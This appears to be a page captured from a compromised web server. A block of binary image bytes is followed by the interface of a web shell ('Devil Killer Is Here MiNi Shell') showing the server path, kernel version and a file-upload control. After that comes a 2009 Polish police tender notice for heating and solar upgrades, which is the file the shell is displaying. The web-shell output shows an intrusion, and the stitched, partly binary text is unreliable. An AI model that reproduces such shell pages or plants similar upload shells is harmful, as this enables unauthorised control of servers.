JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090826/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090826/294522-N-2009.html

<p class="kh_header"><b>Gorzów Wielkopolski: TERMOMODERNIZACJA BUDYNKU KOMENDY MIEJSKIEJ POLICJI W ZIELONEJ GÓRZE</b><br>
<b>Numer ogłoszenia: 294522 - 2009; data zamieszczenia: 26.08.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Komenda Wojewódzka Policji , ul. Kwiatowa 10, 66-400 Gorzów Wielkopolski, woj. lubuskie, tel. 095 7211420, faks 095 7211455.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.lubuska.policja.gov.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> Nie Dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Policja.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> TERMOMODERNIZACJA BUDYNKU KOMENDY MIEJSKIEJ POLICJI W ZIELONEJ GÓRZE.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje wymianę instalacji C.O. po trasie istniejących rurociągów wraz z wymianą i doborem grzejników oraz wykonanie instalacji solarnej i pomp ciepła na potrzeby przygotowania ciepłej wody użytkowej dla Komendy Miejskiej Policji w Zielonej Górze ul. Partyzantów 40, działka 330/2. 

Zamówienie dotyczy wykonania, na czynnym obiekcie, robót budowlanych w zakres których wchodzi:: wymiana instalacji C.O. po trasie istniejących rurociągów wraz z wymianą i doborem grzejników oraz wykonanie instalacji solarnej i pomp ciepła na potrzeby przygotowania ciepłej wody użytkowej dla Komendy Miejskiej Policji w Zielonej Górze ul. Partyzantów 40, działka 330/2. 
Projektowany system solarny będzie zasilany przez 30 kolektorów słonecznych powiązanych w baterie po 5 kolektorów . System zostanie zamontowany na dachu budynku KMP za pomocą odpowiedniej konstrukcji  wsporczej. Ciepła woda użytkowa wytwarzana będzie w systemie solarnego podgrzewu w zestawie 4 równolegle podłączonych solarnych podgrzewaczy pojemnościowych o pojemności akumulacyjnej 1000 litrów każdy.  
Do przygotowania ciepłej wody w okresach braku lub niedostatecznego nasłonecznienia układ grzewczy współpracować będzie z dwiema pompami powietrzno-wodnymi.
Instalacja C.O. składać się będzie z trzech gałęzi biorących początek na istniejących rozdzielaczach zlokalizowanych w piwnicy. 
W zakres zadania wchodzą:
1.Roboty demontażowe istniejącej instalacji centralnego ogrzewania na sześciu kondygnacjach ( w tym dwa poziomy piwnic) w budynku Komendy Miejskiej Policji w Zielonej Górze.
2.Wykonanie nowej instalacji centralnego ogrzewania na sześciu kondygnacjach ( w tym dwa poziomy piwnic) w budynku Komendy Miejskiej Policji w Zielonej Górze.
3.Zakup i montaż kolektorów słonecznych wraz z niezbędną armaturą - 30 kolektorów słonecznych powiązanych w baterie po 5 kolektorów.
4.Wykonanie instalacji solarnej.
5.Zakup i montaż podgrzewaczy pojemnościowych.
6.Zakup i montaż pomp ciepła - 2szt.
7.Instalacje elektryczne wewnętrzne i zewnętrzne dla zadania : Termomodernizacja budynku KMP w Zielonej Górze.
8.Podłączenie automatyki oraz sterowania dla zadania : Termomodernizacja budynku KMP w Zielonej Górze.
10.Roboty budowlane - wykucia bruzd, przebić w ścianach, robót malarskich, zamurowywanie bruzd i przejść przez ścianę, otynkowanie i pomalowanie otworów w przegrodach budowlanych dla instalacji rurociągów, zakup i montaż konstrukcji wsporczej pod kolektory, wykonanie przejść przez stropy i przez dach, wykonanie tynków uzupełniających.
11.Wszystkie prace remontowe muszą być wykonywane w trakcie eksploatacji budynku; Wykonawca ma obowiązek sporządzenia informacji dotyczących zasad bezpieczeństwa i ochrony zdrowia ze względu na prowadzenie robót w trakcie użytkowania obiektu.
12.Wykonanie wszelkich niezbędnych badań  i  prób: ciśnieniowych, szczelności, wytrzymałości, jakości wody  itp.
13.Szczegółowy zakres rzeczowy przedmiotu zamówienia określa Dokumentacja Techniczna.
14.Sporządzenie dokumentacji powykonawczej. 
15.W przypadku powstania w trakcie realizacji prac odpadów lub elementów wymagających utylizacji za ich prawidłową, zgodną z obowiązującymi przepisami utylizację jest odpowiedzialny Wykonawca;
16.Wykonawca udzieli :
a)W zakresie instalacji C.O. minimum 36 miesięcznej gwarancji i rękojmi na przedmiot zamówienia licząc od momentu dokonania odbioru końcowego robót -  zgodnie z art. 568 Kodeksu Cywilnego. 
b)W zakresie instalacji solarnej i pomp ciepła  - min. 5 lat gwarancji (maks. 10 lat) licząc od daty odbioru końcowego 

Parametry charakteryzujące nieruchomość: Istniejący budynek składa się z 4 segmentów , z tego 1 segment (lewy) ze względu na innego niż KMP  użytkownika  posiada własną, niezależną instalację C.O. i nie wchodzi w zakres zadania inwestycyjnego będącego przedmiotem zamówienia.
Powierzchnia całkowita budynku KMP w Zielonej Górze wynosi : 12.658,4 m.kw, w tym powierzchnia ogrzewalna 6.463,0 m.kw. Budynek posiada sześć kondygnacji ogrzewalnych, w tym dwa poziomy piwnic.

Miejsce wykonania przedmiotu zamówienia:
 budynek Komendy Miejskiej Policji w Zielonej Górze 
 Zielona Góra,  ul. Partyzantów 40;  działka o numerze ewidencyjnym  330/2.

Termin wykonania  zamówienia: maksymalnie do 29 stycznia 2010 r. 

Wymagany termin płatności za wykonane roboty - płatności na podstawie faktur częściowych wystawionych po zakończeniu każdej z części będącej przedmiotem zamówienia, tj. 
a) wymianie instalacji centralnego ogrzewania po trasie istniejących rurociągów wraz z wymianą i 	doborem grzejników;
b) wykonaniu instalacji solarnej i pomp ciepła na potrzeby przygotowania ciepłej wody użytkowej, płatne w ciągu 45 dni od dnia dostarczenia faktury VAT do siedziby Zamawiającego, jednakże nie wcześniej niż 3 dni robocze od otrzymania przez Zamawiającego na rachunek bankowy Komendy Wojewódzkiej Policji w Gorzowie Wlkp. środków finansowych 	pochodzących z uruchomienia rezerwy celowej, przyznanej KWP w Gorzowie Wlkp. przez Ministra Finansów Decyzją 	nr 48/126/2009 z dnia 21 maja 2009r..o zapewnieniu finansowania realizacji przedsięwzięcia..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.21.00.00-2, 45.33.00.00-9, 45.23.21.41-2, 45.26.12.10-9, 45.40.00.00-1, 09.33.11.00-9, 42.51.11.10-5.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 29.01.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Przystępując do przetargu Wykonawca (zaproszony do złożenia oferty) zobowiązany będzie do wniesienia wadium w kwocie 25.000,00 zł (słownie: dwadzieścia pięć tysięcy złotych 00/100). Szczegóły dotyczące sposobu i formy wnoszenia wadium będą zawarte 
w SIWZ i są zgodne z art. 45 Ustawy Prawo zamówień publicznych.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają następujące warunki:
1.Posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień; W przypadku Wykonawców występujących wspólnie warunek musi być spełniony przez każdego z Wykonawców osobno.
2.Posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia:
2.1 Wykonawca musi wykazać się należytym wykonaniem  - min. 3 robót budowlanych zrealizowanych w 100% (w okresie ostatnich 5 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli  okres prowadzenia działalności jest krótszy - w tym okresie), odpowiadających swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia, w tym, min. jedna robota budowlana polegająca na wymianie instalacji C.O. na czynnym obiekcie (budynek w trakcie eksploatacji) o powierzchni ogrzewalnej min. 5.000 m2 każda wykazana robota oraz min. jedna robota polegająca na wykonaniu systemu solarnego o powierzchni absorpcji min. 80m2 dla każdego wykazanego systemu z podaniem ich wartości, daty, miejsca wykonania, odbiorców oraz załączeniem dokumentów potwierdzających, że roboty te zostały wykonane należycie (np. listy referencyjne). W przypadku Wykonawców występujących wspólnie warunek musi być spełniony wspólnie przez występujących Wykonawców.
2.2 Wykonawca musi dysponować  osobami posiadającymi uprawnienia do realizacji przedmiotu zamówienia, tj: 
- Kierownikiem Budowy - posiadającym uprawnienia  o specjalności sanitarnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i 	kanalizacyjnych bez ograniczeń.
- Kierownikiem robót ogólnobudowlanych posiadającym uprawnienia  konstrukcyjno - budowlane bez ograniczeń;
- Kierownikiem robót elektrycznych posiadającym uprawnienia o specjalności elektrycznej w zakresie sieci, instalacji, urządzeń elektrycznych i elektroenergetycznych bez ograniczeń; 
- Kierownikiem robót sanitarnych posiadającym uprawnienia  o specjalności sanitarnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i	kanalizacyjnych bez ograniczeń.
Zamawiający dopuszcza jednoczesne pełnienie przez Kierownika Budowy funkcji Kierownika robót sanitarnych.
W przypadku Wykonawców występujących wspólnie warunek musi być spełniony wspólnie przez występujących Wykonawców, z tym że Kierownikiem Budowy musi być przedstawiciel Lidera.	
Kierownik Budowy oraz Kierownicy robót (branżowych) muszą załączyć do wniosku dokumenty (oryginały lub kserokopie potwierdzone za zgodność przez Wykonawcę) potwierdzające posiadanie wymaganych polskim prawem budowlanym uprawnień do pełnienia samodzielnych funkcji technicznych w budownictwie oraz  potwierdzające przynależność  do właściwych organów samorządu zawodowego i potwierdzające wpis do centralnego rejestru osób posiadających uprawnienia budowlane (dot. osób, które uzyskały uprawnienia po 1995r.).
2.3 Wykonawca musi posiadać lub zapewnić dostęp do sprzętu niezbędnego do realizacji zamówienia.
2.4 Zamawiający dopuszcza możliwość udziału podwykonawców w realizacji zadania.
2.5 Zamawiający zastrzega, iż Wykonawca nie może powierzyć podwykonawcy funkcji Kierownika Budowy. 
3. Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia:
3.1 Wykonawca musi być ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej , a w okresie trwania budowy będzie musiał posiadać ubezpieczenie (RBM) Ryzyk Budowlano Montażowych; W przypadku Wykonawców występujących wspólnie warunek musi być  spełniony wspólnie przez Wykonawców składających ofertę wspólną.
3.2 Wykonawca musi posiadać środki finansowe lub zdolność kredytową umożliwiającą wykonanie zadania tj. 1 mln. zł; W przypadku Wykonawców występujących wspólnie warunek musi być spełniony wspólnie przez Wykonawców składających ofertę wspólną.
4. Nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podst. art. 24 ustawy P.z.p.. W przypadku Wykonawców występujących wspólnie warunek musi być spełniony przez każdego z Wykonawców osobno.
5. Przedsiębiorców prowadzących działalność gospodarczą w formie spółki cywilnej należy traktować jako wykonawców wspólnie ubiegających się o udzielenie zamówienia (wyrok ZA UZP/ZO/0-1089/05); W przypadku zaproszenia do złożenia oferty przez spółkę cywilną Zamawiający zastrzega sobie prawo wezwania do wglądu do umowy spółki cywilnej.
6. Ocena spełniania powyższych warunków będzie odbywała się na podstawie złożonych przez Wykonawcę dokumentów zgodnie z WYKAZEM WYMAGANYCH DOKUMENTÓW (WWD), WWD wraz z wzorami formularzy jest dostępny na stronie internetowej Zamawiającego www.lubuska.policja.gov.pl. Ponadto WWD jest udostępniany Wykonawcom w formie papierowej lub elektronicznej  na ich pisemny wniosek, który można kierować do Zamawiającego faksem na nr 0957211435 lub e-mailem: kwp_gorzow.zamowienia@lubuska.policja.gov.pl.
7. Z treści dokumentów złożonych na potwierdzenie spełniania warunków udziału w postępowaniu musi jednoznacznie wynikać, ze Wykonawca spełnia wyżej postawione warunki.
8. Ocena wniosków - oparta będzie na ocenie spełnia  nie spełnia wszystkich warunków. 
Jeżeli  ilość  wniosków spełniających minimalne wymagania będzie większa niż 5, Zamawiający dokona oceny 	złożonych wniosków wg kryterium: doświadczenie.
Kryterium oceny wniosków: doświadczenie - znaczenie 100%.
 Zamawiający przyzna:
1 pkt  - za wykazanie wymaganych minimum 3 robót budowlanych zrealizowanych w 100%,  w tym, min. jedna robota budowlana polegająca na wymianie instalacji C.O. na czynnym obiekcie (budynek w trakcie eksploatacji) o powierzchni ogrzewalnej min. 5.000 m2 każda wykazana robota oraz min. jedna robota polegająca na wykonaniu systemu solarnego o powierzchni absorpcji min. 80m2 każdego wykazanego systemu;
1 pkt - za każdą zrealizowaną w 100% robotę budowlaną wykazaną ponad wymagane minimum (potwierdzoną odp. dokumentami, że została należycie wykonana).
9. Liczba Wykonawców, którzy zostaną zaproszeni do składania ofert:  5. 
Zamawiający zaprosi do składania ofert wyłącznie tych Wykonawców, którzy spełniają warunki udziału w postępowaniu oraz zdobędą najwyższą liczbę punktów. W przypadku, gdy nie będzie można dokonać zakwalifikowania 5 wniosków, z uwagi na to, że 2 lub więcej wniosków uzyskało taką samą liczbę punktów, Zamawiający spośród tych wniosków wybierze te, których łączna wartość wykazanych zamówień brutto będzie najwyższa..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. W celu potwierdzenia spełnienia wymaganych warunków udziału w postępowaniu do Wniosku o  dopuszczenie do udziału w postępowaniu przetargowym  należy dołączyć: 
a.oświadczenie, że Wykonawca spełnia warunki art. 22 ust. 1 ustawy P.z.p. i nie podlega wykluczeniu z postępowania  na podstawie art. 24 ust. 1 i 2 ustawy Prawo zamówień publicznych z dnia 29 stycznia 2004r. (Dz. U. z 2007r. Nr 223 poz. 1655 z późn. zm.) W przypadku Wykonawców występujących wspólnie warunek musi być spełniony przez każdego z występujących Wykonawców. Oświadczenie musi być złożone  osobno przez wszystkich Wykonawców składających ofertę wspólną (zał. nr 1 do WWD), 
b. w przypadku gdy Wykonawcę reprezentuje pełnomocnik, do wniosku musi  być dołączone stosowne upoważnienie lub pełnomocnictwo (W FORMIE ORYGINAŁU LUB KOPII POŚWIADCZONEJ ZA ZGODNOŚĆ  Z ORYGINAŁEM PRZEZ NOTARIUSZA (SĄD OKRĘGOWY W WARSZAWIE - SYGN. AKT V CA 85/07)), określające zakres czynności do których jest umocowany. 
c. wykaz osób i podmiotów, które będą uczestniczyć w wykonaniu zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania przez nich zamówienia,  a także zakresu wykonywanych przez nich czynności (zał. nr 2 WWD); Do wykazu należy załączyć aktualne dokumenty potwierdzające posiadanie uprawnień do realizacji przedmiotu zamówienia oraz przynależność do właściwych organów samorządu zawodowego (Okręgowa Izba Budowlana). Ze złożonych dokumentów musi wynikać, że Wykonawca spełnia warunek postawiony przez Zamawiającego w pkt. I ppkt 2.3 WWD; W przypadku Wykonawców występujących wspólnie ze złożonych dokumentów musi wynikać, że wspólnie spełniają ten warunek, z tym że Kierownikiem Budowy musi być przedstawiciel Lidera.
d. pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego (o ile dotyczy) i osób zdolnych do wykonania zamówienia (dotyczy osób zatrudnionych u innego niż Wykonawca pracodawcy); 
e. wykaz wykonanych  robót budowlanych (zał. nr 3 do WWD) - w okresie ostatnich 5 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli  okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia, z podaniem ich wartości oraz daty, miejsca wykonania i odbiorców oraz załączeniem dokumentów potwierdzających że roboty te zostały wykonane należycie (np. listy referencyjne). Ze złożonych dokumentów musi wynikać, ze Wykonawca spełnia warunek postawiony przez Zamawiającego w pkt. I ppkt 2.1 WWD; W przypadku Wykonawców występujących wspólnie warunek musi być spełniony wspólnie przez występujących Wykonawców.
f. aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do rejestru działalności gospodarczej. Dokument winien być wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia; W przypadku Wykonawców występujących wspólnie dokument musi być złożony osobno przez każdego członka konsorcjum.
g. aktualne informacje z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4 - 8 ustawy Prawo zamówień publicznych z dnia 29 stycznia 2004r. (Dz. U. z 2007r. Nr 223 poz. 1655 z późn. zm.) wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia; W przypadku Wykonawców występujących wspólnie dokumenty muszą być złożone osobno przez każdego członka konsorcjum.
h. aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy Prawo zamówień publicznych z dnia 29 stycznia 2004r. (Dz. U. z 2007r. Nr 223 poz. 1655 z późn. zm.), wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia; W przypadku Wykonawców występujących wspólnie dokumenty muszą być złożone osobno przez każdego członka konsorcjum.
i. oświadczenie o posiadaniu ważnej polisy a w przypadku jej braku innego dokumentu ubezpieczenia, potwierdzającego, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej oraz że w okresie trwania budowy będzie posiadał ubezpieczenie (RBM) Ryzyk Budowlano Montażowych; W przypadku Wykonawców występujących wspólnie, ze złożonych dokumentów musi wynikać, że wspólnie spełniają ten warunek. 
Wykonawca  zaproszony do złożenia oferty będzie musiał złożyć dokument potwierdzający spełnianie warunku.	
Ze złożonego oświadczenia musi wynikać, ze Wykonawca spełnia warunek postawiony przez Zamawiającego w pkt I ppkt 3.1 WWD; 
j. oświadczenie o posiadaniu środków finansowych lub zdolności kredytowej umożliwiającej wykonanie przedmiotu zamówienia;; W przypadku Wykonawców występujących wspólnie ze złożonego oświadczenia musi wynikać, że wspólnie spełniają ten warunek. Ze złożonego oświadczenia musi wynikać, ze Wykonawca spełnia warunek postawiony przez Zamawiającego w pkt I ppkt 3.2 WWD
Wykonawca  zaproszony do złożenia oferty będzie musiał złożyć dokument potwierdzający    spełnianie warunku (np. informacja z banku).
k. oświadczenie o woli współpracy Wykonawców  wspólnie składających ofertę, ustanawiające pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia publicznego i zawarcia umowy w sprawie zamówienia publicznego (wyznaczenie lidera); W przypadku Wykonawców występujących wspólnie zastosowanie maja przepisy ustawy zawarte w art. 23 ust. 1-4 ustawy P.z.p..
l. w przypadku złożenia oferty przez spółkę cywilną należy załączyć upoważnienie lub pełnomocnictwo ustanawiające pełnomocnika do reprezentowania s.c. w postępowaniu o udzielenie zamówienia publicznego i zawarcia umowy w sprawie zamówienia publicznego.
m. oświadczenie o dysponowaniu niezbędnymi do wykonania zamówienia narzędziami i urządzeniami (zał. nr 4 do WWD). 
2. Wykonawcy zagraniczni: 
Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczpospolitej Polskiej mają zastosowanie przepisy § 2 Rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006r. z późn. zm. 
W sprawie rodzajów dokumentów jakich może żądać Zamawiający od wykonawcy, oraz form w jakich te dokumenty mogą być składane. 
3. Zamawiający wykluczy z postępowania Wykonawców, którzy nie spełniają warunków udziału w postępowaniu lub nie złożą dokumentów potwierdzających spełnianie warunków udziału w postępowaniu (art. 25 w powiązaniu z art. 26 ustawy Prawo zamówień publicznych z dnia 29 stycznia 2004r. (Dz. U. z 2007r. Nr 223 poz. 1655 z późn. zm.).
4. Wszystkie wymagane dokumenty muszą być dostarczone w formie oryginałów lub kserokopii poświadczonej za zgodność z oryginałem wraz z podpisem lub parafką Wykonawcy lub osoby przez niego upoważnionej - 
z zastrzeżeniem pkt II ppkt 1 lit.b) WWD.
5. Jeżeli złożona przez Wykonawcę kopia dokumentu jest nieczytelna lub budzi wątpliwości co do jej prawdziwości Zamawiający może żądać przedstawienia oryginałów lub notarialnie  potwierdzonych kopii dokumentów. 
6. Dokumenty sporządzone w języku obcym muszą być składane wraz z tłumaczeniem na język polski, poświadczonym przez Wykonawcę, chyba że Zamawiający wyraził zgodę, o której mowa w art. 9 ust.3 ustawy Prawo zamówień publicznych z dnia 29 stycznia 2004r. (Dz. U. z 2007r. Nr 223 poz. 1655 z późn. zm.).
7. Złożenie przez Wykonawcę fałszywych lub stwierdzających nieprawdę informacji (dokumentów, załączników, oświadczeń itp.) mających wpływ na wynik prowadzonego postępowania powoduje wykluczenie Wykonawcy 
z przetargu na każdym jego etapie, zgodnie z dyspozycją art. 24 ust. 2 pkt. 2 ustawy P.z.p.. Osoba lub osoby składające ofertę ponoszą pełną odpowiedzialność za treść złożonego oświadczenia woli na zasadach określonych w art. 297 §1 Kodeksu Karnego..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg ograniczony.</p>
<p><b>IV.1.2) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu:</b> 5.</p><br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1"><br>
<li>1 - Cena - 80</li>
<li>2 - termin realizacji robót - 20</li>
</ul><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.lubuska.policja.gov.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Nie Dotyczy.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.09.2009 godzina 12:00, miejsce: Komenda Wojewódzka Policji - Sekcja ds. Zamówień Publicznych,  ul. Kwiatowa 10;  66-400 Gorzów Wlkp. z widocznym dopiskiem na kopercie WNIOSEK TERMOMODENIZACJA ZIELONA GÓRA ZP-25/09.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
